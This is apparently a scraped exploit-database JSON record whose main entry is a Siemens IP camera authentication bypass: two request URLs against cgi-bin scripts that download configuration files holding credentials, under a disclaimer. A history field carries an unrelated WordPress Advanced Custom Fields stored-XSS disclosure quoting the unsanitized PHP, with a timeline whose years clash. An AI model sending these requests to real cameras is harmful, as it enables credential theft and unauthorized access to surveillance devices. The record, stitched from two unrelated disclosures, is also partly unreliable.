{"hash": "e17d6d6f67d562cbdcd76a35b9fba128c5dd26855d580aa6820ab1528e2b7086", "id": "1337DAY-ID-25275", "lastseen": "2018-03-14T06:40:09", "viewCount": 5, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "705e4a86f7d8115ba39badec1b887add", "key": "description"}, {"hash": "5d1ec4ad848d59dbb6d4b1bb885b3ab0", "key": "href"}, {"hash": "7c20eff80704443937957aa4419bed73", "key": "modified"}, {"hash": "7c20eff80704443937957aa4419bed73", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "98054c138c0aa11d9194d8740bfc5a3d", "key": "reporter"}, {"hash": "0d3f54ad0f91051520bc03bcc9eca977", "key": "sourceData"}, {"hash": "a3b9a8e9107eff22b4f60ff09d1a241f", "key": "sourceHref"}, {"hash": "9e658badf4781e4625db20bebf49d6c0", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"vulnersScore": 5.0}, "type": "zdt", "sourceHref": "https://0day.today/exploit/25275", "description": "Exploit for cgi platform in category web applications", "title": "SIEMENS IP Cameras (Multiple Models) - Credential Disclosure / Configuration Download", "history": [{"bulletin": {"hash": "64107d78b287334fc867701d61982f457c291acfaf103205d389b73a55750211", "id": "1337DAY-ID-25275", "lastseen": "2016-05-04T08:58:13", "enchantments": {"score": {"value": 6.0, "modified": "2016-05-04T08:58:13"}}, "hashmap": [{"hash": "4ed7125049d645019b6eebcb04b5daf6", "key": "published"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "0db55af307e3a1f4aba1111608bd9a9c", "key": "title"}, {"hash": "fdc35097f1f1f65c59118222bfee9f4c", "key": "reporter"}, {"hash": "101e0e357007e4f91f21708932fae25e", "key": "href"}, {"hash": "4ab3519d4d552ffd65156e460497e76f", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "6e0be1c6e2fd6443940b416994f14557", "key": "sourceHref"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "36e9f68038b3436e0f277dc5c11def22", "key": "description"}, {"hash": "4ed7125049d645019b6eebcb04b5daf6", "key": "modified"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/25275", "description": "WordPress Advanced Custom Fields plugin version 4.4.7 suffers from a cross site scripting vulnerability.", "viewCount": 5, "title": "WordPress Advanced Custom Fields 4.4.7 Cross Site Scripting Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "## FULL DISCLOSURE\r\n\r\n#Product : Advanced Custom Fields\r\n#Exploit Author : Rahul Pratap Singh\r\n#Version : 4.4.7\r\n#Home page Link :https://wordpress.org/plugins/advanced-custom-fields/\r\n#Website : https://0x62626262.wordpress.com\r\n#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94\r\n#Date : 1/5/2016\r\n\r\nAuthenticated XSS Vulnerability:\r\n\r\n----------------------------------------\r\nDescription:\r\n----------------------------------------\r\n\"type, label, name and field\" parameters are not sanitized that leads to\r\nXSS.\r\n\r\n----------------------------------------\r\nVulnerable Code:\r\n----------------------------------------\r\n\r\nFile Name: testfiles/advanced-custom-fields/core/views/meta_box_fields.php\r\n\r\nFound at line:97\r\n<div class=\"field field_type-<?php echo $field['type']; ?>\r\nfield_key-<?php echo $field['key']; ?>\" data-type=\"<?php echo\r\n$field['type']; ?>\" data-id=\"<?php echo $field['key']; ?>\">\r\n\r\nFound at line:105\r\n<a class=\"acf_edit_field row-title\" title=\"<?php _e(\"Edit this\r\nField\",'acf'); ?>\" href=\"javascript:;\"><?php echo $field['label']; ?></a>\r\n\r\nFound at line:113\r\n<td class=\"field_name\"><?php echo $field['name']; ?></td>\r\n\r\nFound at line:251\r\n<input class=\"conditional-logic-field\" type=\"hidden\" name=\"fields[<?php\r\necho $field['key']; ?>][conditional_logic][rules][<?php echo $rule_i;\r\n?>][field]\" value=\"<?php echo $rule['field']; ?>\" />\r\n\r\n----------------------------------------\r\nPOC:\r\n----------------------------------------\r\nhttps://0x62626262.files.wordpress.com/2016/05/advanced-custom-fields-xss1.png\r\n\r\nFix:\r\nNo Fix\r\n\r\nVulnerability Disclosure Timeline:\r\n\u2192 April 24, 2016 \u2013 Contact to Vendor via support\r\n\u2192 April 24, 2015 \u2013 Vendor Response\r\n\u2192 April 27, 2015 \u2013 Bug Report Sent\r\n\u2192 April 27, 2015 \u2013 Vendor Response, asked for more info\r\n\u2192 April 28, 2015 \u2013 More info sent\r\n\u2192 April 29, 2015 \u2013 No fix. To do list for version 5.0\r\n\r\nPub Ref:\r\nhttps://0x62626262.wordpress.com/2016/05/01/advanced-custom-fields-auth-xss-vulnerability\n\n# 0day.today [2016-05-04] #", "published": "2016-05-03T00:00:00", "references": [], "reporter": "Rahul Pratap Singh", "modified": "2016-05-03T00:00:00", "href": "http://0day.today/exploit/description/25275"}, "lastseen": "2016-05-04T08:58:13", "edition": 1, "differentElements": ["description", "published", "reporter", "modified", "sourceHref", "sourceData", "title", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "# \r\n#\r\n# Multiple SIEMENS IP Cameras auth bypass configuration download\r\n#\r\n# Tested: \r\n# SIEMENS IP Camera CCID1410-ST X.1.0.24\r\n# SIEMENS IP Camera CCMW1025 x.2.2.1798\r\n# SIEMENS IP Camera CCMS2025 x.2.2.1798\r\n# SIEMENS IP Camera CVMS2025-IR x.2.2.1798\r\n# SIEMENS IP Camera CVMS2025-IR CxMS2025_V2458\r\n# SIEMENS IP Camera CVMS2025-IR CxMS2025_V2458_SP1\r\n# SIEMENS IP Camera CCPW5025-IR CCPWx025_V0.1.58\r\n# \r\n# ...and more, more devices who use same firmware\r\n#\r\n# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>\r\n# http://www.ethical-hacker.org/\r\n# https://www.facebook.com/ethicalhackerorg\r\n# \r\n# Disclaimer:\r\n# This or previous programs is for Educational\r\n# purpose ONLY. Do not use it without permission.\r\n# The usual disclaimer applies, especially the\r\n# fact that Todor Donev is not liable for any\r\n# damages caused by direct or indirect use of the\r\n# information or functionality provided by these\r\n# programs. The author or any Internet provider\r\n# bears NO responsibility for content or misuse\r\n# of these programs or any derivatives thereof.\r\n# By using these programs you accept the fact\r\n# that any damage (dataloss, system crash,\r\n# system compromise, etc.) caused by the use\r\n# of these programs is not Todor Donev's\r\n# responsibility.\r\n# \r\n# Use them at your own risk!\r\n#\r\n# \r\n \r\nhttp://TARGET/cgi-bin/chklogin.cgi?file=config.ini\r\nhttp://TARGET/cgi-bin/check.cgi?file=ikwd03conf.ini\n\n# 0day.today [2018-03-14] #", "published": "2016-08-19T00:00:00", "references": [], "reporter": "Todor Donev", "modified": "2016-08-19T00:00:00", "href": "https://0day.today/exploit/description/25275"}

{"result": {}}